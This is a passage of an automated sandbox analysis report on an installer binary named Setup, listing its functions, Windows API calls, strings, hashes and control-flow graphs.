                                                                                                                                                                    • Instruction Fuzzy Hash: AB025B75C0024DEFDF00DFE8C948ADDBBB8AF09308F548958E515BB251D735AA0ACB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA76A7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 99libraryloaderthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA76AE
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000020,69DAF845,?), ref: 69DA7748
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 69DA7758
                                                                                                                                                                    • SetThreadStackGuarantee.KERNEL32(00020000), ref: 69DA776D
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(69DB416A), ref: 69DA7774
                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 69DA777A
                                                                                                                                                                      • Part of subcall function 69D77C6E: __EH_prolog3.LIBCMT ref: 69D77C75
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$AddressCommandExceptionFilterGuaranteeHandleLineModuleProcStackThreadUnhandled_malloc
                                                                                                                                                                    • String ID: SetThreadStackGuarantee$kernel32.dll$passive
                                                                                                                                                                    • API String ID: 4088884676-825548933
                                                                                                                                                                    • Opcode ID: 1455cf5666e313d2fc55056dbf74e90fac88413add95672d0efef97fb5fffd1f
                                                                                                                                                                    • Instruction ID: c99cbadef94c5530a9731f5edb7394c97a4f88c69d7d489fa7a459add86d5c1f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1455cf5666e313d2fc55056dbf74e90fac88413add95672d0efef97fb5fffd1f
                                                                                                                                                                    • Instruction Fuzzy Hash: C141AFB5C01380DFDB21CFB9C98469EBBF4BB15304FA0897ED08A9BA51C7319648CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D85B82 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69D85B8C
                                                                                                                                                                    • _memset.LIBCMT ref: 69D85BBB
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,????), ref: 69D85BDA
                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?), ref: 69D85CA8
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 69D85CC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
                                                                                                                                                                    • String ID: ????
                                                                                                                                                                    • API String ID: 2365859831-1216582215
                                                                                                                                                                    • Opcode ID: 7be782d660b73658c5e8001508ba834625bbeb2812111f394fc434a32b1f6dd2
                                                                                                                                                                    • Instruction ID: 72671cf4484d98518b4ec0e1b39a6aff6ce159237abbae43b9b6928fad7a7c94
                                                                                                                                                                    • Opcode Fuzzy Hash: 7be782d660b73658c5e8001508ba834625bbeb2812111f394fc434a32b1f6dd2
                                                                                                                                                                    • Instruction Fuzzy Hash: 55318F75804619DADF10DFA4CD8CBAEB7B8AF01359F0086F5E549E6590DB35CA84CF20
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DEFE2 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 698DEFFE
                                                                                                                                                                    • _memset.LIBCMT ref: 698DF018
                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 698DF032
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 698DF04D
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 698DF061
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 949835396-0
                                                                                                                                                                    • Opcode ID: 37ca6d38e42822d1ef3ccc1cc6da6584643ab74ad56a17890f77d078b65fbf45
                                                                                                                                                                    • Instruction ID: 092bcfc89f01eab30d7c882c0440fa1136c7d27454fa95b816d02289017cca03
                                                                                                                                                                    • Opcode Fuzzy Hash: 37ca6d38e42822d1ef3ccc1cc6da6584643ab74ad56a17890f77d078b65fbf45
                                                                                                                                                                    • Instruction Fuzzy Hash: A401D231901058AFCB10EB65DC4CEAE77B8FF96324F400599E815D7180DB309E49DAE0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ECBE6 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$MessageSend$CallbackDispatcherParentTextUserWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2000255171-0
                                                                                                                                                                    • Opcode ID: 1bce5818fe7bb9ddd601f0047e3e7883bd87f72ef4b8f6aa2c4d9ddcdc2f86be
                                                                                                                                                                    • Instruction ID: 27f4288b63f7162872ab09aa1db72fee70f1d706445c860e9430fc7989f39a30
                                                                                                                                                                    • Opcode Fuzzy Hash: 1bce5818fe7bb9ddd601f0047e3e7883bd87f72ef4b8f6aa2c4d9ddcdc2f86be
                                                                                                                                                                    • Instruction Fuzzy Hash: E4C19D71A0420ADFDF14CF68C5A1A9E7BB4FB0A304F50491EF96697282D771E962CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBB390 Relevance: 50.5, APIs: 12, Strings: 16, Instructions: 1496threadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 69dbb390-69dbb4a9 call 69dd6e52 call 69dbd446 call 69dbd713 call 69da833e call 69db988c call 69da4e70 call 69dc8f0e call 69da833e call 69db988c call 69dc8eab call 69d7a8cc call 69da833e call 69da5033 call 69dc8f0e call 69da51c0 SysFreeString call 69dc8f0e call 69dbd01e call 69d859b8 call 69d86083 39 69dbb4ab-69dbb50f call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa 0->39 40 69dbb514-69dbb54d call 69d85e2b GetCommandLineW call 69d73e77 call 69db9293 0->40 39->40 53 69dbb54f 40->53 54 69dbb555-69dbb5ac call 69da833e call 69db988c call 69d94718 call 69dc8f0e call 69da833e 40->54 53->54 72 69dbb5ae 54->72 73 69dbb5b4-69dbb614 call 69da84b9 call 69dc8f0e * 2 54->73 72->73 81 69dbb630-69dbb75a call 69d92d50 call 69d92d73 call 69d73a16 GetThreadLocale call 69d741d6 call 69da7889 call 69da7db0 call 69da7c9e call 69da7e78 call 69d743c4 call 69d75e41 73->81 82 69dbb616-69dbb620 call 69d94a3f 73->82 106 69dbb768-69dbb785 call 69da8f73 81->106 107 69dbb75c-69dbb762 81->107 85 69dbb625-69dbb627 82->85 85->81 87 69dbb629 85->87 87->81 119 69dbb7a8-69dbb7c2 call 69da833e 106->119 120 69dbb787-69dbb7a6 call 69dc8eab 106->120 107->106 108 69dbb883-69dbb887 107->108 110 69dbb889-69dbb88d 108->110 111 69dbb893-69dbb89c call 69da53e5 108->111 110->111 113 69dbb956-69dbb9a8 call 69da6dcb call 69d92d2f call 69d74272 110->113 117 69dbb8a1-69dbb8a3 111->117 137 69dbb9aa-69dbb9b8 call 69d742b6 113->137 138 69dbb9c3-69dbb9c5 113->138 117->113 121 69dbb8a9-69dbb953 call 69dbcb31 call 69da833e call 69dbce5c call 69dc8f0e * 2 call 69da5a5a call 69d943ed call 69d741a9 call 69d85b32 call 69dbd6d1 call 69dd6f06 117->121 131 69dbb7c9-69dbb7f7 call 69d92d50 call 69da75b5 call 69dc8f0e 119->131 120->131 156 69dbb80b-69dbb813 131->156 157 69dbb7f9-69dbb806 call 69dc8f0e 131->157 137->138 151 69dbb9ba-69dbb9bd 137->151 143 69dbb9c6-69dbba05 call 69d96e46 call 69dc8f0e call 698ee1ad 138->143 167 69dbba7c-69dbbab6 call 69d92d50 call 69dc8f0e 143->167 168 69dbba07-69dbba27 call 69dbcb31 143->168 151->138 155 69dbb9bf-69dbb9c1 151->155 155->143 161 69dbb820-69dbb84b call 69da8e8b 156->161 162 69dbb815-69dbb81b call 69dc8f0e 156->162 157->156 184 69dbb850-69dbb852 161->184 162->161 197 69dbbab8-69dbbadc call 69dbcb31 167->197 198 69dbbae1-69dbbb00 call 69d7be2b 167->198 179 69dbba2c-69dbba75 call 69da833e call 69dbce5c call 69d96f61 call 69dabe94 call 69dc8f0e * 2 168->179 179->167 188 69dbb85e-69dbb87e call 69dc8f0e * 3 184->188 189 69dbb854-69dbb859 call 69da7a1c 184->189 188->108 189->188 197->179 211 69dbbbd0-69dbbc04 call 69d92d50 call 69dc8f0e 198->211 212 69dbbb06-69dbbb0d 198->212 228 69dbbb2c-69dbbb74 call 69d92d50 call 69dbcec8 call 69dc8f0e 211->228 231 69dbbc0a-69dbbc48 call 69dbcb31 call 69da833e call 69dbce5c 211->231 212->211 216 69dbbb13-69dbbb1d call 69dcc0aa 212->216 224 69dbbbc8-69dbbbcb 216->224 225 69dbbb23-69dbbb29 216->225 224->228 225->228 241 69dbbc5b-69dbbc68 call 69d74272 228->241 242 69dbbb7a-69dbbbc0 call 69d96f61 call 69dabe94 call 69dc8f0e * 2 228->242 248 69dbbc4b-69dbbc56 231->248 249 69dbbc6a-69dbbc78 call 69d742b6 241->249 250 69dbbc7f-69dbbccc call 69dbcb31 call 69da833e call 69dbce5c 241->250 242->224 248->241 249->250 259 69dbbc7a-69dbbc7d 249->259 275 69dbbcce-69dbbcda 250->275 259->250 262 69dbbcdf-69dbbd02 call 69da833e call 69d74552 259->262 276 69dbbd72-69dbbdcb call 69d92d50 call 69da586d call 69dc8f0e call 69da594b 262->276 277 69dbbd04-69dbbd6d call 69dbcb31 call 69da833e call 69dbce5c call 69dc8f0e 262->277 275->248 295 69dbbeed-69dbbf26 call 69d92d50 call 69dc8f0e 276->295 296 69dbbdd1-69dbbdd6 276->296 277->275 319 69dbbf9b-69dbc011 call 69d92d50 call 69d98fce call 69d74486 call 69dc8f0e 295->319 320 69dbbf28-69dbbf91 CloseHandle call 69dc8f0e * 2 call 69d96f61 call 69dabe94 call 69dc8f0e * 2 295->320 297 69dbbe8d-69dbbee8 call 69dbcb31 call 69da833e call 69dbce5c CloseHandle call 69dc8f0e 296->297 298 69dbbddc-69dbbe85 call 69da833e call 69daae4a call 69d7420c call 69da7a92 CloseHandle call 69dc8f0e * 2 call 69d96f61 call 69dabe94 call 69dc8f0e * 2 296->298 297->295 298->297 345 69dbc100-69dbc16c call 69d74486 call 69da833e call 69dc8f0e 319->345 346 69dbc017-69dbc01b 319->346 320->319 387 69dbc17b-69dbc233 GetTempPathW call 69dc8afc call 69d92d73 call 69d92d50 call 69da8c7a call 69da8c24 call 69daff21 call 69dc8f0e * 4 CreateDirectoryW 345->387 388 69dbc16e-69dbc178 call 69dc8d3a 345->388 349 69dbc01d-69dbc021 346->349 350 69dbc023-69dbc030 call 69d7420c 346->350 349->350 354 69dbc036-69dbc03d call 69d99048 349->354 350->345 350->354 365 69dbc042-69dbc04c 354->365 373 69dbc04e-69dbc051 365->373 374 69dbc053-69dbc060 365->374 377 69dbc0a4-69dbc0e5 call 69d7420c call 69da7a92 call 69dc8f0e 373->377 374->377 384 69dbc062-69dbc06b 374->384 394 69dbc0ea-69dbc0f3 377->394 384->394 395 69dbc06d-69dbc089 call 69da833e call 69dab057 384->395 427 69dbc25c-69dbc275 call 69da833e call 69da84b9 387->427 428 69dbc235-69dbc240 GetLastError 387->428 388->387 394->345 407 69dbc0f5-69dbc0fb call 69dbd713 394->407 409 69dbc08e-69dbc09d call 69dc8f0e 395->409 407->345 409->377 438 69dbc278-69dbc3ec call 69dc8f0e * 2 call 69dbd779 call 69dbe449 call 69d759a2 call 69da1494 call 69d75d3f call 69dc8eab call 69d74486 427->438 428->427 429 69dbc242-69dbc25a call 69d75d3f call 69da84b9 428->429 429->438 458 69dbc3ee 438->458 459 69dbc3f4-69dbc4e1 call 69d759a2 call 69dc8f0e call 69d74460 call 69d976bb call 69dc8f0e call 69d74460 call 69d976bb call 69dc8f0e call 69d74460 call 69dc8f0e 438->459 458->459 480 69dbc4e3-69dbc4f2 459->480 481 69dbc4f5-69dbc52f call 69d97053 459->481 480->481 485 69dbc627-69dbc6a5 481->485 486 69dbc535-69dbc622 call 69dbcb31 call 69da833e call 69dbce5c call 69d97148 call 69d97773 * 2 call 69d97292 call 69dc8f0e * 2 call 69d97292 call 69dbe49e call 69dbd985 call 69dc8f0e * 2 481->486 508 69dbc6cc-69dbc6e8 call 69d7420c 485->508 509 69dbc6a7-69dbc6c0 485->509 486->485 521 69dbc6ea-69dbc6f8 508->521 522 69dbc713-69dbc740 call 69da7a92 call 69d92d50 508->522 509->508 516 69dbc6c2-69dbc6c9 509->516 516->508 524 69dbc6fa-69dbc6fd 521->524 525 69dbc6ff-69dbc70d 521->525 535 69dbc742-69dbc750 call 69dc63d7 522->535 536 69dbc755-69dbc8ec call 69dc8f0e call 69d97148 call 69d97773 * 2 call 69d97292 call 69dc8f0e * 2 call 69d97292 call 69dbe49e call 69dbd985 call 69dc8f0e * 3 CloseHandle call 69dc8f0e * 2 call 69d96f61 call 69dabe94 call 69dc8f0e * 2 call 69da5a5a call 69d943ed call 69d741a9 call 69d85b32 call 69dbd6d1 522->536 524->522 524->525 525->522 535->536
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DBB39A
                                                                                                                                                                      • Part of subcall function 69DBD446: __EH_prolog3_catch.LIBCMT ref: 69DBD44D
                                                                                                                                                                      • Part of subcall function 69DBD446: GetCommandLineW.KERNEL32(0000006C,69DBB3B6,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBD48E
                                                                                                                                                                      • Part of subcall function 69DBD446: CoInitialize.OLE32(00000000), ref: 69DBD4EF
                                                                                                                                                                      • Part of subcall function 69DBD713: CreateThread.KERNEL32(00000000,00000000,69DC23E8,?,00000000,00000000), ref: 69DBD729
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
                                                                                                                                                                      • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
                                                                                                                                                                      • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
                                                                                                                                                                      • Part of subcall function 69DA4E70: __EH_prolog3.LIBCMT ref: 69DA4E77
                                                                                                                                                                      • Part of subcall function 69DA4E70: __CxxThrowException@8.LIBCMT ref: 69DA4F68
                                                                                                                                                                      • Part of subcall function 69DA4E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 69DA4F7E
                                                                                                                                                                      • Part of subcall function 69DA4E70: FindCloseChangeNotification.KERNEL32(?), ref: 69DA4FA1
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                      • Part of subcall function 69DA5033: __EH_prolog3.LIBCMT ref: 69DA503A
                                                                                                                                                                      • Part of subcall function 69DA5033: __CxxThrowException@8.LIBCMT ref: 69DA50B6
                                                                                                                                                                      • Part of subcall function 69DA51C0: __EH_prolog3_catch.LIBCMT ref: 69DA51C7
                                                                                                                                                                      • Part of subcall function 69DA51C0: CoInitialize.OLE32(00000000), ref: 69DA51DC
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DBB471
                                                                                                                                                                      • Part of subcall function 69DBD01E: __EH_prolog3.LIBCMT ref: 69DBD025
                                                                                                                                                                      • Part of subcall function 69DBD01E: PathFileExistsW.SHLWAPI(?,69D661FC,graphics,?,00000054,69DBB48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DBD0BE
                                                                                                                                                                      • Part of subcall function 69D859B8: __EH_prolog3.LIBCMT ref: 69D859BF
                                                                                                                                                                      • Part of subcall function 69D86083: __EH_prolog3_catch.LIBCMT ref: 69D8608A
                                                                                                                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?), ref: 69DBB51F
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DBB50F
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 69DBB6C8
                                                                                                                                                                      • Part of subcall function 69DA7889: __EH_prolog3.LIBCMT ref: 69DA7890
                                                                                                                                                                      • Part of subcall function 69DA7DB0: __EH_prolog3.LIBCMT ref: 69DA7DB7
                                                                                                                                                                      • Part of subcall function 69DA7C9E: __EH_prolog3.LIBCMT ref: 69DA7CA5
                                                                                                                                                                      • Part of subcall function 69DA7E78: __EH_prolog3.LIBCMT ref: 69DA7E7F
                                                                                                                                                                      • Part of subcall function 69D743C4: __EH_prolog3.LIBCMT ref: 69D743CB
                                                                                                                                                                      • Part of subcall function 69D75E41: __EH_prolog3.LIBCMT ref: 69D75E48
                                                                                                                                                                      • Part of subcall function 69D75E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,69D75E13,?,69DA831D,?,0000000C,69D77D3D,?,00000000,?,?,69D6AB18,00000008), ref: 69D75E83
                                                                                                                                                                      • Part of subcall function 69D75E41: PathFindExtensionW.SHLWAPI(?), ref: 69D75EA0
                                                                                                                                                                      • Part of subcall function 69DA6DCB: GetCommandLineW.KERNEL32(F0D05EFD,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 69DA6E16
                                                                                                                                                                      • Part of subcall function 69DA594B: __EH_prolog3.LIBCMT ref: 69DA5952
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBBED4
                                                                                                                                                                      • Part of subcall function 69DAAE4A: __EH_prolog3.LIBCMT ref: 69DAAE51
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 69DBBE22
                                                                                                                                                                      • Part of subcall function 69D96F61: __EH_prolog3.LIBCMT ref: 69D96F68
                                                                                                                                                                      • Part of subcall function 69DABE94: _free.LIBCMT ref: 69DABEBC
                                                                                                                                                                      • Part of subcall function 69DABE94: _free.LIBCMT ref: 69DABECD
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 69DBBF2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchLineThrow$FindHandle$InitializeNameRelativeThread_free$ChangeCreateDispatcherExceptionExistsExtensionFreeLocaleModuleNotificationReadStringUser
                                                                                                                                                                    • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                                                                                                                                    • API String ID: 1658402695-280204926
                                                                                                                                                                    • Opcode ID: de53e6d29ad6d5b8eb2df9e7175d40c6bab9cf0ceab9e1355233dc41e30834e9
                                                                                                                                                                    • Instruction ID: f5bb862c5a4e994fcb06c0ceea1c2cea616ec3c999018b4c325462a02611a333
                                                                                                                                                                    • Opcode Fuzzy Hash: de53e6d29ad6d5b8eb2df9e7175d40c6bab9cf0ceab9e1355233dc41e30834e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 94E25A75D00258EFCF11DFA8C944ADDBBB8BF05318F1081A9E419BB695CB34AA49CF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8F8CD Relevance: 44.4, APIs: 4, Strings: 21, Instructions: 646COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 723 69d8f8cd-69d8f908 call 69dd6e1a call 69da833e 728 69d8f90a-69d8f90c 723->728 729 69d8f910-69d8f93a call 69d795c1 call 69dc8f0e call 69da85bc 723->729 728->729 736 69d8f979-69d8f989 call 69da85bc 729->736 737 69d8f93c-69d8f942 729->737 744 69d8f98b-69d8f991 736->744 745 69d8f9c2-69d8f9d2 call 69da85bc 736->745 738 69d8f950-69d8f964 call 69dc8f0e 737->738 739 69d8f944-69d8f94a 737->739 746 69d8f96c 738->746 747 69d8f966-69d8f968 738->747 739->738 749 69d8f99f-69d8f9b3 call 69dc8f0e 744->749 750 69d8f993-69d8f999 744->750 756 69d8fa12-69d8fa22 call 69da85bc 745->756 757 69d8f9d4-69d8f9da 745->757 752 69d8f971-69d8f976 call 69dd6f06 746->752 747->746 759 69d8f9bb-69d8f9c0 749->759 760 69d8f9b5-69d8f9b7 749->760 750->749 766 69d8fa62-69d8fb0f call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa call 69dd6e1a call 69da833e 756->766 767 69d8fa24-69d8fa2a 756->767 762 69d8f9ec-69d8fa00 call 69dc8f0e 757->762 763 69d8f9dc-69d8f9e2 757->763 759->752 760->759 772 69d8fa08-69d8fa0d 762->772 773 69d8fa02-69d8fa04 762->773 763->762 796 69d8fb11-69d8fb13 766->796 797 69d8fb17-69d8fb68 call 69d7a1ff call 69dc8f0e call 69da833e 766->797 769 69d8fa3c-69d8fa50 call 69dc8f0e 767->769 770 69d8fa2c-69d8fa32 767->770 779 69d8fa58-69d8fa5d 769->779 780 69d8fa52-69d8fa54 769->780 770->769 772->752 773->772 779->752 780->779 796->797 804 69d8fb6a-69d8fb6c 797->804 805 69d8fb70-69d8fb92 call 69d78d44 call 69d81c2e 797->805 804->805 810 69d8fb9a-69d8fbd0 call 69dc8f0e call 69da833e 805->810 811 69d8fb94-69d8fb96 805->811 816 69d8fbd8-69d8fbfa call 69d78d44 call 69d81d3d 810->816 817 69d8fbd2-69d8fbd4 810->817 811->810 822 69d8fbfc-69d8fbfe 816->822 823 69d8fc02-69d8fc38 call 69dc8f0e call 69da833e 816->823 817->816 822->823 828 69d8fc3a-69d8fc3c 823->828 829 69d8fc40-69d8fc63 call 69d78d44 call 69d8784c 823->829 828->829 834 69d8fc6b-69d8fca0 call 69dc8f0e call 69da833e 829->834 835 69d8fc65-69d8fc67 829->835 840 69d8fca8-69d8fcc8 call 69d79411 call 69d83ba9 834->840 841 69d8fca2-69d8fca4 834->841 835->834 846 